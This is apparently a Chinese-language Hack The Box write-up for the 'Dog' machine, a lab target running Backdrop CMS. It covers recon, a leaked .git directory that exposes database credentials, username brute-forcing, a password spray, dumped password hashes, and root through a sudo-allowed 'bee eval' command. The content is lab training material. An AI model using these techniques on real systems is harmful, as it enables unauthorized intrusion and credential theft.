HTB_Dog
Recon
ports_info
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-10 10:29 +08
Nmap scan report for 10.129.254.126
Host is up (0.23s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
| 256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_ 256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin
| /comment/reply /filter/tips /node/add /search /user/register
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-git:
| 10.129.254.126:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: todo: customize url aliases. reference:https://docs.backdro...
|_http-title: Home | Dog
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.85 seconds
发现存在git泄露,使用git-dumperdump下来, 浏览目标文件,在settings.php下发现了,mysql数据库的连接凭据和hash加密的盐值(salt)。保存下来,留待备用。使用grep匹配一些关键字,比如:password、username、version等。发现了目标使用的是1.27.1版本的backdrop CMS。
Exploit
USER
google发现其存在文件上传漏洞,但到目前我并没有找到有效用户和凭据。也许git目录存在信息尚未被获取,暂时存疑。在浏览历史漏洞时,发现在密码找回界面存在任意用户枚举漏洞,验证也确实存在。针对这点,进行用户名爆破,使用seclists字典下的username字典。经过一段时间的等待后,出现了两个用户名:john与tiffany。使用数据库密码尝试登录cms,tiffany成功登录。 使用前面找到的exp,也获得了初始立足点。权限为www-data。信息枚举出目标机器用户有:
root:x:0:0:root:/root:/bin/bash
jobert:x:1000:1000:jobert:/home/jobert:/bin/bash
johncusack:x:1001:1001:,,,:/home/johncusack:/bin/bash
且本地开放端口3306,可以考虑连接数据库获取用户hash进行离线破解。
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
LISTEN 0 511 *:80 LISTEN 0 128 [::]:22 [::]:*
连接数据库,得到用户hash如下:
mysql> select * from users;
+-----+-------------------+---------------------------------------------------------+----------------------------+-----------+------------------+------------+------------+------------+------------+--------+----------+----------+---------+----------------------------+------------+
| uid | name | pass | mail | signature | signature_format | created | changed | access | login | status | timezone | language | picture | init | data |
+-----+-------------------+---------------------------------------------------------+----------------------------+-----------+------------------+------------+------------+------------+------------+--------+----------+----------+---------+----------------------------+------------+
| 0 | | | | | NULL | 0 | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL |
| 1 | jPAdminB |$S$E7dig1GTaGJnzgAXAtOoPuaTjJ05fo8fH9USc6vO87T./ffdEr/. | jPAdminB@dog.htb | | NULL | 1720548614 | 1720584122 | 1720714603 | 1720584166 | 1 | UTC | | 0 | jPAdminB@dog.htb | 0x623A303B |
| 2 | jobert | $S$E/F9mVPgX4.dGDeDuKxPdXEONCzSvGpjxUeMALZ2IjBrve9Rcoz1 | jobert@dog.htb | | NULL | 1720584462 | 1720584462 | 1720632982 | 1720632780 | 1 | UTC | | 0 | jobert@dog.htb | NULL |
| 3 | dogBackDropSystem |$S$EfD1gJoRtn8I5TlqPTuTfHRBFQWL3x6vC5D3Ew9iU4RECrNuPPdD | dogBackDroopSystem@dog.htb | | NULL | 1720632880 | 1720632880 | 1723752097 | 1723751569 | 1 | UTC | | 0 | dogBackDroopSystem@dog.htb | NULL |
| 5 | john | $S$EYniSfxXt8z3gJ7pfhP5iIncFfCKz8EIkjUD66n/OTdQBFklAji. | john@dog.htb | | NULL | 1720632910 | 1720632910 | 0 | 0 | 1 | UTC | | 0 | john@dog.htb | NULL |
| 6 | morris | $S$E8OFpwBUqy/xCmMXMqFp3vyz1dJBifxgwNRMKktogL7VVk7yuulS | morris@dog.htb | | NULL | 1720632931 | 1720632931 | 0 | 0 | 1 | UTC | | 0 | morris@dog.htb | NULL |
| 7 | axel| $S$E/DHqfjBWPDLnkOP5auHhHDxF4U.sAJWiODjaumzxQYME6jeo9qV | axel@dog.htb | | NULL | 1720632952 | 1720632952 | 0 | 0 | 1 | UTC | | 0 | axel@dog.htb | NULL |
| 8 | rosa | $S$EsV26QVPbF.s0UndNPeNCxYEP/0z2O.2eLUNdKW/xYhg2.lsEcDT | rosa@dog.htb | | NULL | 1720632982 | 1720632982 | 0 | 0 | 1 | UTC | | 0 | rosa@dog.htb | NULL |
| 10 | tiffany| $S$EEAGFzd8HSQ/IzwpqI79aJgRvqZnH4JSKLv2C83wUphw0nuoTY8v | tiffany@dog.htb | | NULL | 1723752136 | 1723752136 | 1738963404 | 1738643285 | 1 | UTC | | 0 | tiffany@dog.htb | NULL |
+-----+-------------------+---------------------------------------------------------+----------------------------+-----------+------------------+------------+------------+------------+------------+--------+----------+----------+---------+----------------------------+------------+
有几个hash结合前面的盐值可以尝试破解。但是并不含与linux用户相关的hash。存疑。 再执行破解前再使用前面的数据库密码试试密码喷洒。结果成功登录。。。。。。。
Root
sudo -l发现存在
Matching Defaults entries for johncusack on dog:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User johncusack may run the following commands on dog:
(ALL : ALL) /usr/local/bin/bee
分析bee的命令发现存在一个eval功能
ADVANCED
db-query
dbq
Execute a query using db_query().
eval
ev, php-eval
Evaluate (run/execute) arbitrary PHP code after bootstrapping Backdrop.
php-script
scr
Execute an arbitrary PHP file after bootstrapping Backdrop.
sql
sqlc, sql-cli, db-cli
Open an SQL command-line interface using Backdrop's database credentials.
搜索发现Bee是backdrop cms的命令行工具。利用这个功能点,尝试提权。
johncusack@dog:~$ sudo bee eval "system("whoami";)"
✘ The required bootstrap level for 'eval' is not ready.
遇到这个问题,疑惑。思考觉得,会不会是因为bee的运行环境有问题?毕竟他是为backdrop cms开发的。而且此cli的Global Options就是设置运行目录相关的。不设置则默认选取当前工作目录。 将当前工作目录切换到/var/www/html。 再次运行,提权成功。
Summary
这里的寻找初始立足点时的用户名是我结合历史漏洞暴力破解出来的,进行grep正则匹配时,没能获取用户有效信息。参考别人的思路,匹配的是@dog.htb。则获取了用户名tiffany。还是我思考不周。
Beyond
尝试对hash进行爆破,由于电脑性能有限。在相当长的时间内进行尝试,未获取到有效密码。